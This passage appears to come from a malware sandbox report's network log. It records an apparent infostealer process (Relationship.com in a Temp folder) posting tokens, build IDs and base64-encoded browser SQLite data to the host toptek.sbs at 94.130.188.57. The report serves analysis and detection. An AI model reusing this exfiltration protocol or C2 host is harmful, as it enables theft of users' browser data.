                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:00 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          16192.168.2.44977694.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:01 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JE3OPZM79H47QI589ZCB
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:01 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JE3OPZM79H47QI589ZCBCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          17192.168.2.44978294.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 169765
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q1NGDT0R9H4EU37QIMYMCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:04 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                                          Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                                          2024-12-22 21:48:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:05 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          18192.168.2.44978894.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:05 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 66001
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q1NGDT0R9H4EU37QIMYMCont
